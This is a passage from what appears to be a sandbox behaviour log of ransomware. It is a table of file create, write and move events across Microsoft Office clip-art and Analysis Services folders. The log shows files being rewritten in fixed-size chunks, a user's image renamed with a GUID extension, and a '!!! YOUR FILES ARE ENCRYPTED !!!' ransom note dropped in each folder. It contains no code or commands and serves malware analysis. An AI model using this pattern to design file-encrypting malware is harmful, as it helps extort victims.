| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101860.BMP | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101861.BMP | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101862.BMP | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101863.BMP | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101864.BMP | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101865.BMP | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101866.BMP | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101867.BMP | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101980.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0102002.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0102594.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0102762.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0102984.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0103058.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0103262.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0103402.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0103812.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0103850.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105230.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105232.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105234.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105238.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105240.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105244.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105246.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105250.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105266.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105272.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105276.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105280.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105282.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105286.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105288.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105292.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105294.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105298.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105306.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105320.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105328.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105332.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105336.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105338.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105348.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105360.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105368.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105376.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105378.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105380.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105384.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105386.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105388.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105390.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105396.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105398.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105410.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105412.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105414.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105490.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105496.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105502.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105504.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105506.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105520.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105526.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105530.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105588.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105600.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105638.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105710.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105846.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105912.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105974.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0106020.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0106124.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0106146.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0106208.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0106222.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0106572.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0106816.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0106958.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107024.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107026.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107042.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107090.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107130.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107132.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107134.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107138.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107146.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107148.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107150.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107152.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107154.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107158.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Move | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\ey6ais\V7c X\- t6YX67FJjNzE.jpg.-20D3E156-A287-60BB-BBEE-4579C665442A | source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\ey6ais\V7c X\- t6YX67FJjNzE.jpg |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl | size = 17285 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\!!! YOUR FILES ARE ENCRYPTED !!!.TXT | size = 959 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl | size = 18773 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Informix.xsl | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Informix.xsl | size = 30981 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Informix.xsl | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Informix.xsl | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Informix.xsl | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\msjet.xsl | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\msjet.xsl | size = 29013 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\msjet.xsl | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\msjet.xsl | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\msjet.xsl | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql2000.xsl | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql2000.xsl | size = 34101 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql2000.xsl | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql2000.xsl | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql2000.xsl | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql70.xsl | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql70.xsl | size = 32181 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql70.xsl | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql70.xsl | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql70.xsl | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql90.xsl | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql90.xsl | size = 39541 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql90.xsl | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql90.xsl | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql90.xsl | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl | size = 29829 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll | size = 4096 |
|
4 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll | size = 37 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll | size = 4 |
|
5 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll | size = 32 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\!!! YOUR FILES ARE ENCRYPTED !!!.TXT | size = 959 |
|
1 | |
| Write | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\ey6ais\V7c X\- t6YX67FJjNzE.jpg | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msolui100.rll | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msolui100.rll | size = 14901 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msolui100.rll | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msolui100.rll | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msolui100.rll | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00004_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00004_.GIF | size = 9061 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00004_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00004_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00004_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\!!! YOUR FILES ARE ENCRYPTED !!!.TXT | size = 959 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00011_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00011_.GIF | size = 7253 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00011_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00011_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00011_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00021_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00021_.GIF | size = 14901 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00021_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00021_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00021_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00037_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00037_.GIF | size = 6709 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00037_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00037_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00037_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00038_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00038_.GIF | size = 3285 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00038_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00038_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00038_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00040_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00040_.GIF | size = 8133 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00040_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00040_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00040_.GIF | size = 1268 |
|
1 | |
